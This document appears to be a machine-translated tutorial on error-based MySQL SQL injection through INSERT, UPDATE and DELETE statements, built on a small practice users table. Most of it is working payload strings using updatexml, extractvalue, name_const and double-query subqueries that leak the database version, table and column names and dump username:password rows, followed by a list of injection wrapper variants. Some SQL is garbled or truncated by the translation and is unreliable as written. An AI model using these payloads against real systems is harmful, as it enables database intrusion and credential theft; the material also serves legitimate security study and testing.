SQL Injection with Insert/update/delete

Preface: SQL injection using INSERT, UPDATE, and delete is slightly different than query-based SQL injection

Reference from: Http://www.exploit-db.com/wp-content/themes/exploit/docs/33253.pdf

0x1 Readiness Conditions

A. mysql database

B. Creating a database and table for experimentation

Create database newdb;  Use newdb the  CREATE TABLE users  (  ID int (3) NOT NULL auto_increment,  username varchar () is not NULL,  Password varchar () not NULL,  PRIMARY KEY (ID)  );

C. Add some data: INSERT into users (ID, username, password) VALUES (1, ' R00tgrok ', ' Ohmygod_is_r00tgrok ');

0x2 using Updatexml () function//XPath injection

1. Inject

A. Load format: or Updatexml (1,concat (0x7e, (version ())), 0) or

B. Insert injection: INSERT into users (ID, username, password) VALUES (2, ' pseudo_z ' or Updatexml (1,concat (0x7e, (version ())), 0) or ', ' Security-eng ');

C. Update injection: Update users SET password= ' Security-eng ' or Updatexml (2,concat (0x7e, (version ())), 0) or ' WHERE id=2 and Usern Ame= ' pseudo_z ';

D. Delete injection: Delete from users WHERE id=2 or Updatexml (1,concat (0x7e, (version ())), 0) or ';

2. Extracting data

A. Load format:

or Updatexml (0,concat (0x7e, (SELECT concat (table_name) from Information_schema.tables WHERE table_schema=database () Limit 0,1)), 0) or

B. Insert Fetch table name:

INSERT into users (ID, username, password) VALUES (2, ' R00tgrok ' or Updatexml (0,concat (0x7e) (SELECT concat (table_name) FRO M information_schema.tables WHERE table_schema=database () limit 0,1)), 0) or ' ', ' Ohmygod_is_r00tgrok ');

C. Insert fetch column name

INSERT into users (ID, username, password) VALUES (2, ' R00tgrok ' or Updatexml (0,concat (0x7e) (SELECT concat (column_name) FR OM information_schema.columns WHERE table_name= ' users ' limit 0,1), 0) or ' ', ' Ohmygod_is_r00tgrok ');

D. Insert for Dump

INSERT into users (ID, username, password) VALUES (2, ' R00tgrok ' or Updatexml (0,concat (0x7e, (': '), ID, user Name, password) from the users limit 0,1), 0) or ', ' Ohmygod_is_r00tgrok ');

E. Delete to dump

DELETE from the users WHERE id=1 or Updatexml (0,concat (0x7e, (SELECT concat_ws (': ', ID, username, password) from the users limit 0,1 )), 0) or ';

F.update to dump?

The same table cannot be dump with update, but different tables can

UPDATE students SET name= ' Nicky ' or Updatexml (1,concat (0x7e, (SELECT concat_ws (': ', ID, username, password) from Newdb.users limit 0,1)), 0) or ' WHERE id=1;

3. Tips

A. Error, then burst out the information to be extracted

B. According to the code on the author paper, mysql5.6.19, the previous extraction of information successfully, the following dump error: [ERR] 1093-you can ' t specify target table ' users ' for the update in the from CLA Use

C. Google, give the two references found:

CASE1:

Error code DELETE from table_name where coulmn_name in (SELECT coulmn_name from table_name where coulmn_name > 10);

Fix code DELETE from table_name where coulmn_name in (SELECT * FROM (select Coulmn_name from table_name where coulmn_name 　　　　　　　　　> ) as X);

Note You cannot delete a row from the same data source that the subquery points to, and the update similarly

CASE2:

CREATE TABLE Comments (id int primary key, phrase text, uid int); INSERT into Comments VALUES (1, ' Admin user comments ', 1), 
    (2, ' HR user Comments ', 2),                           (3, ' RH user Comments ', 2); UPDATE comments     

Fix code:

UPDATE comments   SET phrase = (select phrase from             (                select * from comments             ) as                  C1                  WHERE c1.uid=2 A ND c1.id=2               ) WHERE id = 3;

Description: When you read the same data using a subquery, MySQL does not allow the data in the update, delete table, and MySQL uses the subquery in the FROM statement as a temporary table, encapsulating the subquery into a temporary table that will be executed and stored in a deeper subquery in the FROM statement , and then implicitly referencing in the outer subquery

4. Updatexml () [returns the replaced XML segment], Updatexml () is an XML function in MySQL, and a extractvalue () [Extracts values from an XML string using an XPath notation], also

eg. SET @xml = ' <a><b>X</b><b>Y</b></a> ';

SET @i =1, @j = 2; SELECT @i, Extractvalue (@xml, '//b[[email protected] ');

//ExtractValue(xml_frag, xpath_expr)　　 //UpdateXML(xml_target, xpath_expr, new_xml)

XPath has a number of limitations, such as not supporting node-set comparisons, functions such as String (), and XPath injection similar to SQL injection, with slightly different syntax

0x3 using the Extractvalue () function

A. Load format: or Extractvalue (1,concat (0x7e,database ())) or

B. Injection:

INSERT into users (ID, username, password) VALUES (2, ' R00tgrok ' or Extractvalue (1,concat (0x7e,database ())) or ', ' pseudo_ Z ');

UPDATE users SET password= ' Nicky ' or Extractvalue (1,concat (0x7e,database ())) or ' WHERE id=2 and username= ' pseudo_z ';

DELETE from users WHERE id=1 or Extractvalue (1,concat (0x7e,database ())) or ';

C. Extracting data

INSERT into users (ID, username, password) VALUES (2, ' R00tgrok ' or Extractvalue (1,concat (0x7e) (SELECT concat (table_name) From Information_schema.tables WHERE table_schema=database () limit 0,1))) or ' ', ' Balabala ');

Dump operation and update, delete method ibid. updatexml ()

0x4 is introduced in Name_const ()//5.0.13 to return any given value

A. Payload format: or (Select*from (SELECT (Name_const (Version (), 1)), Name_const (version (), 1)) a) or

B. Injection:

UPDATE users SET password= ' Nicky ' or (Select*from (SELECT (Name_const (Version (), 1)), Name_const (version (), 1)) a) or ' WHERE id=2 and Username= ' pseudo_z ';

C. Extracting data

INSERT into users (IDs, username, password) VALUES (1, ' admin ' or (Select*from (select Name_const (select table_name from INF Ormation_schema.tables WHERE table_schema=database () limit 0,1), 1), Name_const ((SELECT table_name from Information_ Schema.tables WHERE table_schema=database () limit 0,1), 1))) a) or "', ' oyyoug0d ');

0x5 two query injection//mysql no two queries, so use subqueries

1. Inject

INSERT into users (IDs, username, password) VALUES (1, ' R00tgrok ' or (select 1 from (SELECT COUNT (*), concat (select (select C Oncat (0x7e,0x27,cast (Database () as Char), 0x27,0x7e)) from Information_schema.tables limit 0,1), floor (rand (0) *)) x From Information_schema.columns Group by X) a) or ' ', ' bl4ckhat ');

DELETE from the Users WHERE id=1 or (select 1 from (SELECT COUNT (*), concat (SELECT (Select Concat (0x7e,0x27,cast () char), 0x27,0x7e) from Information_schema.tables limit 0,1), floor (rand (0) *)) x from Information_schema.columns Group by x) a) or ';

2. Extracting data

INSERT into users (IDs, username, password) VALUES (1, ' Pseudo_z ' or (select 1 from (SELECT COUNT (*), concat (select (SELECT concat (0x7e,0x27,cast (users.username as Char), 0x27,0x7e) from ' newdb '. Users LIMIT 0,1)) From Information_schema.tables limit 0,1), floor (rand (0) *) x from Information_schema.columns Group by X) a) or ' ', ' jesus- 2014 ');

0x6 other variants

' or (payload) or ' and (payload) and ' or (payload) and ' or (payload) and ' = ' * (payload) * ' or (payload) and ' "– (payload) –"

Attached: http://websec.ca/kb/sql_injection

SQL Injection with Insert/update/delete